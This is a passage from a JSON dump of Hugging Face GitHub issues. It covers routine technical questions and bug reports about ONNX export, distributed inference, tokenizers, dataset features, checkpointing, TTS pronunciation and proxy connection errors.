question was sent in some type of log in chat-ui ? Or just the username and the question?\r\n\r\nHow can we accomplish this?\r\n\r\nThanks", "url": "https://github.com/huggingface/chat-ui/issues/1148", "state": "open", "labels": [], "created_at": "2024-05-16T11:13:30Z", "updated_at": "2024-05-21T18:48:17Z", "comments": 5, "user": "Neb2653" }, { "repo": "huggingface/diffusers", "number": 7957, "title": "How to implement `IPAdapterAttnProcessor2_0` with xformers", "body": "I want to fine-tune IP-adapter model with xformers, but I did not find the implementation of the xformers version corresponding to IPAdapterAttnProcessor2_0. I want to implement attention processor in xformers, are the following two lines of code the only difference between the two versions?\r\n\r\nIn `XFormersAttnProcessor`:\r\n```python\r\nhidden_states = xformers.ops.memory_efficient_attention(\r\n query, key, value, attn_bias=attention_mask, op=self.attention_op, scale=attn.scale\r\n)\r\n```\r\n\r\nIn `AttnProcessor2_0`:\r\n```python\r\nhidden_states = F.scaled_dot_product_attention(\r\n query, key, value, attn_mask=attention_mask, dropout_p=0.0, is_causal=False\r\n)\r\n```", "url": "https://github.com/huggingface/diffusers/issues/7957", "state": "closed", "labels": [], "created_at": "2024-05-16T08:54:07Z", "updated_at": "2024-05-23T13:03:42Z", "user": "JWargrave" }, { "repo": "huggingface/OBELICS", "number": 12, "title": "How to use LDA for topic modeling", "body": "Thanks for your work again!\r\nIn the paper the topic modeling of OBELICS is implemented using LDA, and I am wondering what is the specific LDA model was used, what setting was used to train the model, and most importantly, how the topic was derived from the key words and weights(like using LLMs)? Thank you for answering! ", "url": "https://github.com/huggingface/OBELICS/issues/12", "state": "open", "labels": [], "created_at": "2024-05-16T03:56:29Z", "updated_at": "2024-06-11T16:27:12Z", "user": "jrryzh" }, { "repo": "huggingface/transformers.js", "number": 765, "title": "Can you use all transformers models with transformers.js? ", "body": "### Question\r\n\r\nHi,\r\ncan you use [all transformers models ](https://huggingface.co/models?library=transformers&sort=trending)(which seem to be listed under the python library) also in transformers.js? If yes, how so? Just download and provide the local path? I'm working in nodejs right now.\r\n\r\nFor example I'd like to use something like [Llama 3](https://huggingface.co/meta-llama/Meta-Llama-3-8B) with Transformers.js.\r\nIf that doesn't work, what would be the strongest general purpose LLM available for transformers.js right now (text generation, something like chatgpt, gemini, ...)?\r\n\r\nGreetings & thanks a lot!", "url": "https://github.com/huggingface/transformers.js/issues/765", "state": "open", "labels": [ "question" ], "created_at": "2024-05-15T19:35:28Z", "updated_at": "2024-05-15T21:21:57Z", "user": "Sir-hennihau" }, { "repo": "huggingface/datasets", "number": 6899, "title": "List of dictionary features get standardized", "body": "### Describe the bug\n\nHi, i\u2019m trying to create a HF dataset from a list using Dataset.from_list.\r\n\r\nEach sample in the list is a dict with the same keys (which will be my features). The values for each feature are a list of dictionaries, and each such dictionary has a different set of keys. However, the datasets library standardizes all dictionaries under a feature and adds all possible keys (with None value) from all the dictionaries under that feature.\r\n\r\nHow can I keep the same set of keys as in the original list for each dictionary under a feature?\n\n### Steps to reproduce the bug\n\n```\r\nfrom datasets import Dataset\r\n\r\n# Define a function to generate a sample with \"tools\" feature\r\ndef generate_sample():\r\n # Generate random sample data\r\n sample_data = {\r\n \"text\": \"Sample text\",\r\n \"feature_1\": []\r\n }\r\n \r\n # Add feature_1 with random keys for this sample\r\n feature_1 = [{\"key1\": \"value1\"}, {\"key2\": \"value2\"}] # Example feature_1 with random keys\r\n sample_data[\"feature_1\"].extend(feature_1)\r\n \r\n return sample_data\r\n\r\n# Generate multiple samples\r\nnum_samples = 10\r\nsamples = [generate_sample() for _ in range(num_samples)]\r\n\r\n# Create a Hugging Face Dataset\r\ndataset = Dataset.from_list(samples)\r\ndataset[0]\r\n```\r\n\r\n```{'text': 'Sample text', 'feature_1': [{'key1': 'value1', 'key2': None}, {'key1': None, 'key2': 'value2'}]}```\n\n### Expected behavior\n\n```{'text': 'Sample text', 'feature_1': [{'key1': 'value1'}, {'key2': 'value2'}]}```\n\n### Environment info\n\n- `datasets` version: 2.19.1\r\n- Platform: Linux-5.15.0-1040-nvidia-x86_64-with-glibc2.35\r\n- Python version: 3.10.13\r\n- `huggingface_hub` version: 0.23.0\r\n- PyArrow version: 15.0.0\r\n- Pandas version: 2.2.0\r\n- `fsspec` version: 2023.10.0", "url": "https://github.com/huggingface/datasets/issues/6899", "state": "open", "labels": [], "created_at": "2024-05-15T14:11:35Z", "updated_at": "2025-04-01T20:48:03Z", "comments": 2, "user": "sohamparikh" }, { "repo": "huggingface/transformers", "number": 30827, "title": "Using this command(optimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/) to perform onnx transformation, it is found that the tensor type of the model becomes int64. How to solve this problem?", "body": "### System Info\n\ntransformers version : 4.38.1\r\nplatform: ubuntu 22.04\r\npython version : 3.10.14\r\noptimum version : 1.19.2\n\n### Who can help?\n\n@ArthurZucker and @younesbelkada\n\n### Information\n\n- [X] The official example scripts\n- [ ] My own modified scripts\n\n### Tasks\n\n- [X] An officially supported task in the `examples` folder (such as GLUE/SQuAD, ...)\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\n1.reference conversion command link: https://huggingface.co/docs/transformers/v4.40.1/zh/serialization\r\n2.download model files offline (https://huggingface.co/Qwen/Qwen1.5-0.5B-Chat/tree/main)\r\n3.Execute transition instruction\uff1aoptimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/\r\n\r\nThe conversion results are as follows\uff1a\r\n(mypy3.10_qnn) zhengjr@ubuntu-ThinkStation-P3-Tower:~$ optimum-cli export onnx --model Qwen1.5-0.5B-Chat --task text-generation Qwen1.5-0.5B-Chat_onnx/\r\n2024-05-15 19:42:07.726433: I tensorflow/core/platform/cpu_feature_guard.cc:193] This TensorFlow binary is optimized with oneAPI Deep Neural Network Library (oneDNN) to use the following CPU instructions in performance-critical operations: AVX2 AVX_VNNI FMA\r\nTo enable them in other operations, rebuild TensorFlow with the appropriate compiler flags.\r\n2024-05-15 19:42:07.916257: I tensorflow/core/util/util.cc:169] oneDNN custom operations are on. You may see slightly different numerical results due to floating-point round-off errors from different computation orders. To turn them off, set the environment variable `TF_ENABLE_ONEDNN_OPTS=0`.\r\n2024-05-15 19:42:07.997974: E tensorflow/stream_executor/cuda/cuda_blas.cc:2981] Unable to register cuBLAS factory: Attempting to register factory for plugin cuBLAS when one has already been registered\r\n2024-05-15 19:42:08.545959: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer.so.7'; dlerror: libnvinfer.so.7: cannot open shared object file: No such file or directory\r\n2024-05-15 19:42:08.546100: W tensorflow/stream_executor/platform/default/dso_loader.cc:64] Could not load dynamic library 'libnvinfer_plugin.so.7'; dlerror: libnvinfer_plugin.so.7: cannot open shared object file: No such file or directory\r\n2024-05-15 19:42:08.546104: W tensorflow/compiler/tf2tensorrt/utils/py_utils.cc:38] TF-TRT Warning: Cannot dlopen some TensorRT libraries. If you would like to use Nvidia GPU with TensorRT, please make sure the missing libraries mentioned above are installed properly.\r\nFramework not specified. Using pt to export the model.\r\nThe task `text-generation` was manually specified, and past key values will not be reused in the decoding. if needed, please pass `--task text-generation-with-past` to export using the past key values.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nUsing the export variant default. Available variants are:\r\n - default: The default ONNX variant.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\nSpecial tokens have been added in the vocabulary, make sure the associated word embeddings are fine-tuned or trained.\r\n\r\n***** Exporting submodel 1/1: Qwen2ForCausalLM *****\r\nUsing framework PyTorch: 1.13.1\r\nOverriding 1 configuration item(s)\r\n\t- use_cache -> False\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/modeling_attn_mask_utils.py:114: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if (input_shape[-1] > 1 or self.sliding_window is not None) and self.is_causal:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/optimum/exporters/onnx/model_patcher.py:300: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if past_key_values_length > 0:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/models/qwen2/modeling_qwen2.py:126: TracerWarning: Converting a tensor to a Python boolean might cause the trace to be incorrect. We can't record the data flow of Python values, so this value will be treated as a constant in the future. This means that the trace might not generalize to other inputs!\r\n if seq_len > self.max_seq_len_cached:\r\n/home/zhengjr/anaconda3/envs/mypy3.10_qnn/lib/python3.10/site-packages/transformers/models/qwen2/modeling_qwen2.py:290: TracerWarning: Converting a tensor to a Python boole", "url": "https://github.com/huggingface/transformers/issues/30827", "state": "closed", "labels": [], "created_at": "2024-05-15T12:45:50Z", "updated_at": "2024-06-26T08:04:10Z", "user": "JameslaoA" }, { "repo": "huggingface/chat-ui", "number": 1142, "title": "Feature request, local assistants", "body": "I experimented with a few assistants on HF.\r\nThe problem I am facing is that I don't know how to get the same behaviour I get on HF from local model (which is the same model).\r\nI tried everything I could thing of.\r\nI think HF does some filtering or rephrasing or has an additional prompt before the assistant description.\r\nPlease help.\r\nI am available for chat on discord https://discordapp.com/users/Zibri/", "url": "https://github.com/huggingface/chat-ui/issues/1142", "state": "open", "labels": [ "support" ], "created_at": "2024-05-15T11:11:29Z", "updated_at": "2024-05-27T06:53:21Z", "comments": 2, "user": "Zibri" }, { "repo": "huggingface/optimum", "number": 1855, "title": "how to change optimum temporary path ?", "body": "### Feature request\n\nc drive less space\n\n### Motivation\n\nhelp to solve many issue\n\n### Your contribution\n\ndont know ", "url": "https://github.com/huggingface/optimum/issues/1855", "state": "closed", "labels": [], "created_at": "2024-05-14T11:17:14Z", "updated_at": "2024-10-14T12:22:35Z", "user": "neonarc4" }, { "repo": "huggingface/optimum", "number": 1854, "title": "ai21labs/Jamba-tiny-random support", "body": "### Feature request\n\nai21labs/Jamba-tiny-random mode, is not supported by Optimum export.\r\n\r\nValueError: Trying to export a jamba model, that is a custom or unsupported architecture, but no custom onnx configuration was passed as `custom_onnx_configs`. Please refer to https://huggingface.co/docs/optimum/main/en/exporters/onnx/usage_guides/export_a_model#custom-export-of-transformers-models for an example on how to export custom models. Please open an issue at https://github.com/huggingface/optimum/issues if you would like the model type jamba to be supported natively in the ONNX export.\r\n\n\n### Motivation\n\nJamba is potentially very significant as it has a large context but a small size. This could be used in lots of scenarios if it has good performance.\n\n### Your contribution\n\nUnlikely I could do a PR as ONNX work is not my forte.", "url": "https://github.com/huggingface/optimum/issues/1854", "state": "open", "labels": [ "feature-request", "onnx" ], "created_at": "2024-05-14T10:22:05Z", "updated_at": "2024-10-09T09:10:58Z", "comments": 0, "user": "frankia312" }, { "repo": "huggingface/transformers.js", "number": 763, "title": "Have considered using wasm technology to implement this library? ", "body": "### Question\n\nHello, have you ever considered using wasm technology to implement this library? For example, rust's wgpu-rs and c++'s dawn are both implementations of webgpu. They can be converted to wasm and can also be accelerated with simd.", "url": "https://github.com/huggingface/transformers.js/issues/763", "state": "open", "labels": [ "question" ], "created_at": "2024-05-14T09:22:57Z", "updated_at": "2024-05-14T09:28:38Z", "user": "ghost" }, { "repo": "huggingface/trl", "number": 1643, "title": "How to save and resume a checkpoint from PPOTrainer", "body": "https://github.com/huggingface/trl/blob/5aeb752053876cce64f2164a178635db08d96158/trl/trainer/ppo_trainer.py#L203\r\nIt seems that every time the PPOTrainer is initialized, the accelerator is initialized as well. There's no API provided by PPOTrainer to resume checkpoints. How can we save and resume checkpoints?", "url": "https://github.com/huggingface/trl/issues/1643", "state": "closed", "labels": [], "created_at": "2024-05-14T09:10:40Z", "updated_at": "2024-08-08T12:44:25Z", "user": "paraGONG" }, { "repo": "huggingface/tokenizers", "number": 1531, "title": "How to Batch-Encode Paired Input Sentences with Tokenizers: Seeking Clarification", "body": "Hello.\r\n\r\nI'm using the tokenizer to encoding pair sentences in TemplateProcessing in batch_encode.\r\nThere's a confusing part where the method requires two lists for sentence A and sentence B.\r\n\r\nAccording to the [guide documentation](https://huggingface.co/docs/tokenizers/quicktour): \"To process a batch of sentences pairs, pass two lists to the Tokenizer.encode_batch method: the list of sentences A and the list of sentences B.\"\r\n\r\nSince it instructs to input two lists, it seems like [[A1, A2], [B1, B2]] --(encode)-> {A1, B1}, {A2, B2}.\r\n\r\nHowever, the actual input expects individual pairs batched, not splitting the sentence pairs into lists for A and B. \r\nSo, it should be [[A1, B1], [A2, B2]] to encode as {A1, B1}, {A2, B2}.\r\n\r\nI've also confirmed that the length of the input list for encode_batch keeps increasing with the number of batches.\r\n\r\nSince the guide instructs to input sentence A and sentence B, this is where the confusion arises.\r\nIf I've misunderstood anything, could you help clarify this point so I can understand it better?", "url": "https://github.com/huggingface/tokenizers/issues/1531", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-14T08:03:52Z", "updated_at": "2024-06-21T08:20:05Z", "user": "insookim43" }, { "repo": "huggingface/transformers.js", "number": 762, "title": "Options for the \"translation\" pipeline when using Xenova/t5-small", "body": "### Question\n\nThe translation pipeline is [documented](https://huggingface.co/docs/transformers.js/api/pipelines#module_pipelines.TranslationPipeline) to use {src_lang and tgt_lang} options to translate from the src language to the tgt language. However, when using Xenova/t5-small none of the options seem to be used. Instead looking at the demo code it appears that you have to change the pipeline.task field to \"translation_{fromLanguage}_to_{targetLanguage}\" but I can't find a way to normalize the usage of the translation pipeline with different models.\r\n\r\nIs this task pattern documented somewhere or am I missing some other option settings when calling the translation pipeline?\r\n\r\n\r\n", "url": "https://github.com/huggingface/transformers.js/issues/762", "state": "open", "labels": [ "question" ], "created_at": "2024-05-13T21:09:15Z", "updated_at": "2024-05-13T21:09:15Z", "user": "lucapivato" }, { "repo": "huggingface/datasets", "number": 6894, "title": "Better document defaults of to_json", "body": "Better document defaults of `to_json`: the default format is [JSON-Lines](https://jsonlines.org/).\r\n\r\nRelated to:\r\n- #6891 ", "url": "https://github.com/huggingface/datasets/issues/6894", "state": "closed", "labels": [ "documentation" ], "created_at": "2024-05-13T13:30:54Z", "updated_at": "2024-05-16T14:31:27Z", "comments": 0, "user": "albertvillanova" }, { "repo": "huggingface/chat-ui", "number": 1134, "title": "Websearch failed on retrieving from pdf files", "body": "On chat ui I am getting the error as shown in screenshot, on pdf files it always says \"Failed to parse webpage\". I set USE_LOCAL_WEBSEARCH=True in .env.local. can anyone help me.\r\n![Screenshot (1844)](https://github.com/huggingface/chat-ui/assets/28763364/fc815b17-f29f-481e-813a-e2714ebc9ee5)\r\n\r\n", "url": "https://github.com/huggingface/chat-ui/issues/1134", "state": "open", "labels": [ "support", "websearch" ], "created_at": "2024-05-13T06:41:08Z", "updated_at": "2024-06-01T09:25:59Z", "comments": 2, "user": "prateekvyas1996" }, { "repo": "huggingface/parler-tts", "number": 47, "title": "Custom pronunciation for words - any thoughts / recommendations about how best to handle them?", "body": "Hello! This is a really interesting looking project.\r\n\r\nCurrently there doesn't seem any way that users can help the model correctly pronounce custom words - for instance **JPEG** is something that speakers just need to know is broken down as \"**Jay-Peg**\" rather than **Jay-Pea-Ee-Gee**.\r\n\r\nI appreciate this project is at an early stage but for practical uses, especially with brands and product names often having quirky ways of saying words or inventing completely new words, it's essential to be able to handle their correct pronunciation on some sort of override basis. It's not just brands - plenty of people's names need custom handling and quite a few novel computer words are non-obvious too.\r\n\r\nExamples that cause problems in the current models: **Cillian, Joaquin, Deirdre, Versace, Tag Heuer, Givenchy, gigabytes, RAM, MPEG** etc.\r\n\r\nAre there any suggestions on how best to tackle this?\r\n\r\nI saw there was #33 which uses a normaliser specifically for numbers. Is there something similar for custom words? I suppose perhaps one could drop in a list of custom words and some sort of mapping to the desired pronunciation, applying that as a stage similar to how it handles abbreviations.\r\n\r\nIn espeak backed tools, it's sometimes possible to replace words with custom IPA that replaces the default IPA generated but I believe this model doesn't use IPA for controlling pronunciation. \r\n\r\nGiven the frequently varying pronunciations, I doubt that simply finetuning to include the words would be a viable approach.\r\n\r\nAnyway, would be great to hear what others have to recommend.\r\n\r\n_Incidentally certain mainstream terms also get completely garbled, it seems impossible to get Instagram, Linux or Wikipedia to be spoken properly, but that's more a training data issue and those are mainstream enough that you wouldn't need to cover them via custom overrides._", "url": "https://github.com/huggingface/parler-tts/issues/47", "state": "open", "labels": [], "created_at": "2024-05-12T15:51:05Z", "updated_at": "2025-01-03T08:39:58Z", "user": "nmstoker" }, { "repo": "huggingface/text-generation-inference", "number": 1875, "title": "How to share memory among 2 GPUS for distributed inference?", "body": "# Environment Setup\r\n\r\nRuntime environment:\r\n\r\nTarget: x86_64-unknown-linux-gnu\r\nCargo version: 1.75.0\r\nCommit sha: https://github.com/huggingface/text-generation-inference/commit/c38a7d7ddd9c612e368adec1ef94583be602fc7e\r\nDocker label: sha-6c4496a\r\nKubernetes Cluster deployment\r\n\r\n2 A100 GPU with 80GB RAM\r\n\r\n12 CPU with 32 GB RAM\r\n\r\nTGI version: 2.0.0\r\n\r\nTGI Parameters:\r\nMAX_INPUT_LENGTH: \"8000\"\r\nMAX_TOTAL_TOKENS: \"8512\"\r\nMAX_CONCURRENT_REQUESTS: \"128\"\r\nLOG_LEVEL: \"INFO\"\r\nMAX_BATCH_TOTAL_TOKENS: \"4294967295\"\r\nWAITING_SERVED_RATIO: \"0.3\"\r\nMAX_WAITING_TOKENS: \"0\"\r\nMAX_BATCH_PREFILL_TOKENS: \"32768\"\r\n\r\n\r\n# Question\r\nI am courious about how to optimize distributed inference for LLMs. I see in that in the docs you mention this:\r\n\r\n```\r\n### A note on Shared Memory (shm)\r\n\r\n[`NCCL`](https://docs.nvidia.com/deeplearning/nccl/user-guide/docs/index.html) is a communication framework used by `PyTorch` to do distributed training/inference. `text-generation-inference` make use of `NCCL` to enable Tensor Parallelism to dramatically speed up inference for large language models.\r\n\r\nIn order to share data between the different devices of a `NCCL` group, `NCCL` might fall back to using the host memory if peer-to-peer using NVLink or PCI is not possible.\r\n\r\nTo allow the container to use 1G of Shared Memory and support SHM sharing, we add `--shm-size 1g` on the above command.\r\n\r\nIf you are running `text-generation-inference` inside `Kubernetes`. You can also add Shared Memory to the container by creating a volume with:\r\n\r\n\\- name: shm\r\n emptyDir:\r\n medium: Memory\r\n sizeLimit: 1Gi\r\n\r\nand mounting it to `/dev/shm`.\r\n\r\nFinally, you can also disable SHM sharing by using the `NCCL_SHM_DISABLE=1` environment variable. However, note that this will impact performance.\r\n```\r\n\r\nWe currently have this setup with K8s:\r\n```\r\n - name: m\r\n emptyDir:\r\n sizeLimit: 1Gi\r\n medium: Memory\r\n``` \r\n \r\nHowever, I feel like I am missing something. \r\n\r\nSay GPU memory size is G, model weight in megabytes is M and free available memory for processing requests is F.\r\n\r\nThen when I deploy a model with size M (where M < G) with SHARDED=True and over 2 full GPUs(G_1 and G_2). What I expect is the model weights taking M megabytes from GPU1 (G_1) and then the available/free memory, F, for processing tokens/requests should be (G_1 - M) + G_2 = F. Right?\r\n\r\nInstead what I am seeing is that the model is replicated on both GPUs, so F = (G_1 - M) + (G_2 - M) . I believe this is not what we want. For example with Mistral7b:\r\n\r\n| Sharded | GPU 1 | GPU 2 |\r\n| -------- | ----- | ------ |\r\n| False | 66553MiB / 81920MiB 81% used | Does not exist |\r\n| True | 66553MiB / 81920MiB 81% used | 66553MiB / 81920MiB 81% used |\r\n\r\nWe would like to have the model only on 1 GPU (if it fits) and then use the extra available GPUs just for inference, i.e, increasing our memory budget at processing time by sharing the memory between the left over memory from the GPU where the model weights live and the memory from the GPU without model weights.\r\n\r\nThis is what makes me think we are not using NCCL correctly, or maybe my assumptions are wrong, and what I am saying is not possible to do?\r\n\r\n\r\n# Visual description \r\n\r\n![Screenshot 2024-05-10 at 10 46 34](https://github.com/huggingface/text-generation-inference/assets/58919465/93af371c-558a-4852-9d28-804d73ba9df5)\r\n", "url": "https://github.com/huggingface/text-generation-inference/issues/1875", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-10T08:49:05Z", "updated_at": "2024-06-21T01:48:05Z", "user": "martinigoyanes" }, { "repo": "huggingface/accelerate", "number": 2759, "title": "How to specify the backend of Trainer", "body": "### System Info\n\n```Shell\naccelerate 0.28.0\n```\n\n\n### Information\n\n- [ ] The official example scripts\n- [X] My own modified scripts\n\n### Tasks\n\n- [ ] One of the scripts in the examples/ folder of Accelerate or an officially supported `no_trainer` script in the `examples` folder of the `transformers` repo (such as `run_no_trainer_glue.py`)\n- [X] My own task or dataset (give details below)\n\n### Reproduction\n\nI am running a multi-node, multi-gpu training code on two nodes with one A100-40GB respectively. I don't have the `NCCL` installed on this cluster, so I am trying to use the default `gloo` backend to start training. But I didn't find any documents on how to specify backend when `accelerate launch`. Any help will be very appreciated!\r\nHere is my launching script.\r\n```\r\nsrun -N 2 -n 2 -w xgpg2,xgpg3 accelerate launch --config_file /tmp/my_dist_config.yaml --gradient_accumulation_steps 8 --gradient_clipping 1.0 --mixed_precision bf16 train.py ...my training arguments..\r\n```\r\nHere is my accelerate config on each node.\r\n```\r\n# `/tmp/my_dist_config.yaml` on xgpg2\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ngpu_ids: all\r\nmachine_rank: 0\r\nmain_process_ip: xgpg2\r\nmain_process_port: 9999\r\nmain_training_function: main\r\nmixed_precision: bf16\r\nnum_machines: 2\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n# `/tmp/my_dist_config.yaml` on xgpg3\r\ncompute_environment: LOCAL_MACHINE\r\ndebug: false\r\ndistributed_type: MULTI_GPU\r\ndowncast_bf16: 'no'\r\ngpu_ids: all\r\nmachine_rank: 1\r\nmain_process_ip: xgpg2\r\nmain_process_port: 9999\r\nmain_training_function: main\r\nmixed_precision: bf16\r\nnum_machines: 2\r\nnum_processes: 2\r\nrdzv_backend: static\r\nsame_network: true\r\ntpu_env: []\r\ntpu_use_cluster: false\r\ntpu_use_sudo: false\r\nuse_cpu: false\r\n```\r\nHere is the main body of my training code\r\n```\r\n...\r\ntokenizer = load_tokenizer(model_args.tokenizer_dir, train_mode=model_args.do_train)\r\nmodel = load_model(model_args, quant_config, peft_config)\r\nlogger.info(f\"Model Architecture:\\n{model}\")\r\nprint_trainable_parameters(model)\r\n\r\ntrainer = Trainer(\r\n model=model,\r\n train_dataset=train_data,\r\n eval_dataset=eval_data, \r\n args=trainer_config,\r\n data_collator=PaddToMaxLenCollator(tokenizer, model_args.max_length), \r\n)\r\n\r\n# Training\r\nif model_args.do_train:\r\n train_result = trainer.train(resume_from_checkpoint=model_args.resume_from_checkpoint)\r\n trainer.log_metrics(\"train\", train_result.metrics) \r\n trainer.save_metrics(\"train\", train_result.metrics) \r\n...\r\n```\r\n\r\nI tried to run this directly, but it went into some NCCL error like this:\r\n```\r\ntorch.distributed.DistBackendError: NCCL error in: /opt/conda/conda-bld/pytorch_1704987394225/work/torch/csrc/distributed/c10d/ProcessGroupNCCL.cpp:1691, unhandled system error (run with NCCL_DEBUG=INFO for details), NCCL version 2.19.3\r\n```\r\nI think the NCCL isn't installed on the system by system administrator, but there is a `nccl` library in my conda environment, which could probably be installed as some other library's dependency. I am not familiar with NCCL, but my understanding is this won't work because NCCL should be installed on system level. Am I right?\r\n```\r\n# Name Version Build Channel\r\nnccl 2.21.5.1 h3a97aeb_0 conda-forge\r\n```\n\n### Expected behavior\n\nHope to know how to use the 'gloo' backend for Trainer. And also hope to know if I can use Trainer's Deepspeed Integration with gloo backend", "url": "https://github.com/huggingface/accelerate/issues/2759", "state": "closed", "labels": [], "created_at": "2024-05-10T03:18:08Z", "updated_at": "2025-01-16T10:29:19Z", "user": "Orion-Zheng" }, { "repo": "huggingface/lerobot", "number": 167, "title": "python3.10 how to install rerun-sdk", "body": "### System Info\n\n```Shell\nubuntu18.04\r\npython3.10\r\n\r\n\r\nERROR: Could not find a version that satisfies the requirement rerun-sdk>=0.15.1 (from lerobot) (from versions: none)\r\nERROR: No matching distribution found for rerun-sdk>=0.15.1\n```\n\n\n### Information\n\n- [X] One of the scripts in the examples/ folder of LeRobot\n- [ ] My own task or dataset (give details below)\n\n### Reproduction\n\npip install .\r\n\r\nERROR: Could not find a version that satisfies the requirement rerun-sdk>=0.15.1 (from lerobot) (from versions: none)\r\nERROR: No matching distribution found for rerun-sdk>=0.15.1\n\n### Expected behavior\n\nI want to know how to solve this problem", "url": "https://github.com/huggingface/lerobot/issues/167", "state": "closed", "labels": [ "dependencies" ], "created_at": "2024-05-10T03:07:30Z", "updated_at": "2024-05-13T01:25:09Z", "user": "MountainIntelligent" }, { "repo": "huggingface/safetensors", "number": 478, "title": "Can't seem to skip parameter initialization while using the `safetensors.torch.load_model` API!", "body": "### System Info\r\n\r\n- `transformers` version: 4.40.0\r\n- Platform: Linux-5.15.0-105-generic-x86_64-with-glibc2.35\r\n- Python version: 3.10.12\r\n- Huggingface_hub version: 0.22.2\r\n- Safetensors version: 0.4.1\r\n- Accelerate version: 0.25.0\r\n- Accelerate config: not found\r\n- PyTorch version (GPU?): 2.2.2+cu121 (True)\r\n- Tensorflow version (GPU?): 2.16.1 (True)\r\n- Flax version (CPU?/GPU?/TPU?): 0.8.2 (cpu)\r\n- Jax version: 0.4.26\r\n- JaxLib version: 0.4.21`\r\n\r\n### Reproduction\r\n\r\nIn order to load a serialized model, I use the `safetensors.torch.load_model` API which requires a `torch.nn.Module` type as the first argument. \r\nI create this model while ensuring that the parameters are **not** initialized since they will get overridden anyway. I do this by using the `init_empty_weights` context manager from the `accelerate` package. \r\n```\r\nfrom transformers import LlamaConfig, LlamaForCausalLM\r\nfrom accelerate import init_empty_weights\r\n\r\nconfig = LlamaConfig()\r\nwith init_empty_weights():\r\n model = LlamaForCausalLM(config)\r\nsafetensors.torch.load_model(model, ) //throws an error\r\n```\r\nThe last line throws the error\r\n```\r\n warnings.warn(f'for {key}: copying from a non-meta parameter in the checkpoint to a meta '\r\nUserWarning: for model.norm.weight: copying from a non-meta parameter in the checkpoint to a meta parameter in the current model, which is a no-op. (Did you mean to pass `assign=True` to assign items in the state dictionary to their corresponding key in the module instead of copying them in place?)\r\n```\r\n\r\nTurns out the loading of the state_dict is a no-op which could be resolved by using the `assign=True` argument however the current API doesn't provide a way to set that. Any ideas on how to overcome this issue?\r\n\r\n### Expected behavior\r\n\r\n`load_model` API returns a model object where the state_dict is initialized from the stored checkpoint. ", "url": "https://github.com/huggingface/safetensors/issues/478", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-09T19:12:05Z", "updated_at": "2024-06-15T01:49:24Z", "comments": 1, "user": "goelayu" }, { "repo": "huggingface/tokenizers", "number": 1525, "title": "How to write custom Wordpiece class?", "body": "My aim is get the rwkv5 model\u2018s \"tokenizer.json\",but it implemented through slow tokenizer(class Pretrainedtokenizer).\r\nI want to convert \"slow tokenizer\" to \"fast tokenizer\",it needs to use \"tokenizer = Tokenizer(Wordpiece())\",but rwkv5 has it\u2018s own Wordpiece file.\r\nSo I want to create a custom Wordpiece\r\n\r\nthe code is here\r\n\r\n```python\r\n\r\nfrom tokenizers.models import Model\r\nclass MyWordpiece(Model):\r\n def __init__(self,vocab,unk_token):\r\n self.vocab = vocab\r\n self.unk_token = unk_token\r\n\r\n\r\n\r\ntest = MyWordpiece('./vocab.txt',\"\")\r\n\r\n```\r\n\r\n```\r\nTraceback (most recent call last):\r\n File \"test.py\", line 78, in \r\n test = MyWordpiece('./vocab.txt',\"\")\r\nTypeError: Model.__new__() takes 0 positional arguments but 2 were given\r\n```", "url": "https://github.com/huggingface/tokenizers/issues/1525", "state": "closed", "labels": [ "Stale" ], "created_at": "2024-05-09T03:48:27Z", "updated_at": "2024-07-18T01:53:23Z", "user": "xinyinan9527" }, { "repo": "huggingface/trl", "number": 1635, "title": "How to use trl\\trainer\\kto_trainer.py", "body": "If I want to use KTO trainer, I could set the parameter [loss_type == \"kto_pair\"] in dpo_trainer.py. Then what is kto_trainer.py used for? And how to use it? ", "url": "https://github.com/huggingface/trl/issues/1635", "state": "closed", "labels": [], "created_at": "2024-05-09T02:40:14Z", "updated_at": "2024-06-11T10:17:51Z", "user": "mazhengyufreedom" }, { "repo": "huggingface/datasets", "number": 6882, "title": "Connection Error When Using By-pass Proxies", "body": "### Describe the bug\n\nI'm currently using Clash for Windows as my proxy tunnel, after exporting HTTP_PROXY and HTTPS_PROXY to the port that clash provides\ud83e\udd14, it runs into a connection error saying \"Couldn't reach https://raw.githubusercontent.com/huggingface/datasets/2.19.1/metrics/seqeval/seqeval.py (ConnectionError(MaxRetryError(\"HTTPSConnectionPool(host='raw.githubusercontent.com', port=443): Max retries exceeded with url: /huggingface/datasets/2.19.1/metrics/seqeval/seqeval.py (Caused by NewConnectionError(': Failed to establish a new connection: [Errno 111] Connection refused'))\")))\"\r\nI have already read the documentation provided on the hugginface, but I think I didn't see the detailed instruction on how to set up proxies for this library.\n\n### Steps to reproduce the bug\n\n1. Turn on any proxy software like Clash / ShadosocksR etc.\r\n2. export system varibles to the port provided by your proxy software in wsl (It's ok for other applications to use proxy expect dataset-library)\r\n3. load any dataset from hugginface online\n\n### Expected behavior\n\n---------------------------------------------------------------------------\r\nConnectionError Traceback (most recent call last)\r\nCell In[33], [line 